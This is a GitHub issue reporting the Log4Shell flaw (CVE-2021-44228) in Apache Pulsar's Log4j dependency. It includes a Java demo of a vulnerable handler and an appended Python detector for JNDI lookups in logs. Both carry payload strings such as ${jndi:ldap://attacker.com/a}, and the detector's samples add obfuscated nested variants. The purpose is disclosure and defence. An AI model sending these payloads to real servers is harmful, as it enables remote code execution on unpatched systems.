HQebupt opened a new issue #13232:
URL: https://github.com/apache/pulsar/issues/13232
**Describe the security vulnerability**
There is a remote code injection in Apache Log4j 2.x <= 2.14.1.
Attackers can directly construct malicious requests to trigger remote code
execution vulnerabilities, which has been verified by the Alibaba Cloud security team.
The current Pulsar is using 2.14.0
(`<log4j2.version>2.14.0</log4j2.version>` in pom.xml)
Log4j versions prior to 2.15.0 are subject to a remote code execution
vulnerability via the ldap JNDI parser. However, it is not released yet.
- CVE ID: CVE-2021-44228
**To Reproduce**
Steps to reproduce, following the demo code below.
```java
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import java.io.IOException;
import java.io.OutputStream;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableLog4jExampleHandler implements HttpHandler {
    // Log4j 2.x logger; versions <= 2.14.1 evaluate ${...} lookups in logged messages.
    static final Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class);

    /**
     * A simple HTTP endpoint that reads the request's User Agent and logs it back.
     *
     * This is basically pseudo-code to explain the vulnerability, and not a full example.
     *
     * @param he HTTP Request Object
     */
    @Override
    public void handle(HttpExchange he) throws IOException {
        // Header value is fully attacker-controlled.
        String userAgent = he.getRequestHeaders().getFirst("User-Agent");
        // This line triggers the RCE by logging the attacker-controlled HTTP User-Agent header.
        // The attacker can set their User-Agent header to:
        //   ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:" + userAgent);
        String response = "<h1>Hello There, " + userAgent + "!</h1>";
        he.sendResponseHeaders(200, response.length());
        OutputStream os = he.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }
}
```
**References:**
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- apache/logging-log4j2#608
- https://github.com/tangxiaofeng7/apache-log4j-poc
- https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0
- https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup
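The report above shows the lookup string that Log4j evaluates when it is logged. As an added example (not part of the issue or of the Pulsar code base), the following Python detector normalizes Log4j's nested lookup syntax before checking for a JNDI lookup, so that a scan of access logs or incoming header values does not miss the plain form from the report or the common nested `${lower:...}` / `${::-x}` rewrites of it. The sample log lines, the `attacker.example` host and the function names are constructed for the example; the folding rules (`lower`, `upper` and the `:-` default-value syntax) follow documented Log4j lookup behaviour.

```python
import re

# Innermost ${...} expression: contains no nested "${", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization, e.g. ${jndi:ldap://host/a}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold(m: "re.Match[str]") -> str:
    """Resolve one innermost lookup the way Log4j would, or leave it alone."""
    body = m.group(1)
    kind, sep, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        # Never fold the lookup we are trying to detect.
        return m.group(0)
    # ${name:-default}: Log4j substitutes the default when the lookup is
    # undefined, so an empty name such as ${::-j} simply yields "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    if sep and kind == "lower":
        return arg.lower()
    if sep and kind == "upper":
        return arg.upper()
    # Other lookups (env, sys, date, ...) resolve only at runtime; keep them.
    return m.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly fold innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        folded = _INNER.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text contains a JNDI lookup once nesting is resolved."""
    return _JNDI.search(normalize_lookups(text)) is not None


def scan_lines(lines):
    """Return the indices of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed sample access-log lines (User-Agent is the last quoted field).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:ldap}://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "Price is ${env:HOSTNAME}"',
]

if __name__ == "__main__":
    for i in scan_lines(SAMPLE_LINES):
        print(f"line {i}: {normalize_lookups(SAMPLE_LINES[i])}")
```

The last sample line contains a lookup but not a JNDI one; it is left unflagged here, although a stricter rule could treat any `${` in a request header as suspicious. Detection of this kind is a compensating control only: the fix the report asks for is upgrading `log4j2.version` in pom.xml to a release that no longer resolves JNDI lookups from log messages.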